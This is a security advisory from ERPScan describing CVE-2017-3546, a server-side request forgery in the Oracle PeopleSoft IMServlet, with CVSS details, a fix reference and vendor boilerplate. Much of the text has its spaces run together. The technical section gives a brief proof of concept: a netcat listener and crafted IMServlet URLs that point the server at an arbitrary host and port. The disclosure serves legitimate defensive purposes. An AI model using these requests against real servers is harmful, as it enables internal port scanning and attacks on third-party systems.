Application:OraclePeopleSoftVersionsAffected:ToolsRelease:8.55.03;ToolsReleaseDB:8.55;PeopleSoftHCM9.2VendorURL: http://oracle.com
Bugs:SSRFReported:23.12.2016Vendor response:24.12.2016Date of PublicAdvisory:18.04.2017Reference:OracleCPUApril2017Author:RomanShalymov(ERPScan)Description1.ADVISORYINFORMATIONTitle:[ERPSCAN-17-022]SSRF in PeopleSoftIMServletAdvisoryID:[ERPSCAN-17-022]Risk: high
CVE:CVE-2017-3546AdvisoryURL: https://erpscan.com/advisories/erpscan-17-022-ssrf-peoplesoft-imservlet/Date published:18.04.2017Vendors contacted:Oracle2.VULNERABILITYINFORMATIONClass:SSRFImpact: cross-site port attack, service enumeration
RemotelyExploitable: yes
LocallyExploitable: yes
CVSSInformationCVSSBaseScore v3:8.0/10CVSSBaseVector:AV:AttackVector(Related exploit range)Network(N)AC:AttackComplexity(Required attack complexity)High(H)PR:PrivilegesRequired(Level of privileges needed toexploit)High(H)UI:UserInteraction(Required user participation)None(N)S:Scope(Change in scope due toimpact caused tocomponents beyond
the vulnerable component)Changed(C)C:ImpacttoConfidentialityHigh(H)I:ImpacttoIntegrityHigh(H)A:ImpacttoAvailabilityHigh(H)3.VULNERABILITYDESCRIPTIONAn attacker can force a vulnerable server totrigger malicious
requests tothird-party servers or tointernalresources. This
vulnerability can then be leveraged tolaunch specific attacks such as
a cross-site port attack, service enumeration, and various other
attacks.4.VULNERABLEPACKAGESToolsRelease:8.55.03ToolsReleaseDB:8.55PeopleSoftHCM9.25.SOLUTIONSANDWORKAROUNDSTo correct this vulnerability, implement OracleCPUApril20176.AUTHORRomanShalymov7.TECHNICALDESCRIPTIONPoCRun netcat
1. nc -l -p # on some host
In browser openthe following links
http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT
http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"
Read response in netcat
GET/?param=varHTTP/1.1User-Agent:Java1.7.0_95Host:SOMEHOST:OPEN_PORTAccept: text/html, image/gif, image/jpeg,/; q=.2Connection:Keep-Alive8.ABOUTERPScanResearchERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP,Oracle,Microsoft,IBM,VMware,HPfor discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP10WebHackingTechniques2012) and of the "TheBestServer-SideBug" nomination at BlackHat2013.ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents (e.g. BlackHat,RSA,HITB) and conducted private
trainings for several Fortune2000companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,Yahoo,SCMagazine,TheRegister,CIO,PCWorld,DarkReading,Heise,Chinabyte,etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application toICS/SCADA
systems), gathering their experience toconduct the best SAP security
research.9.ABOUTERPScanERPScan is the most respected and credible BusinessApplicationCybersecurityprovider. Founded in 2010, the company operates globally
and enables large Oil and Gas,Financial,Retail and other
organizations tosecure their mission-critical processes. Named as an
‘EmergingVendor’ in Security by CRN, listed among “TOP100SAPSolution providers” and distinguished by 30+ other awards,ERPScan is
the leading SAPSE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work withSAPSE in Walldorftoassist in improving the security of their latest solutions.
ERPScan’s primary mission is toclose the gap between technical and
business security, and provide solutions forCISO's toevaluate and
secure SAP and OracleERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises,Fortune2000 companies and MSPs, whose requirements
are toactively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in PaloAlto and
Amsterdam,toprovide threat intelligence services, continuous support
and tooperate local offices and partner network spanning 20+
countries around the globe.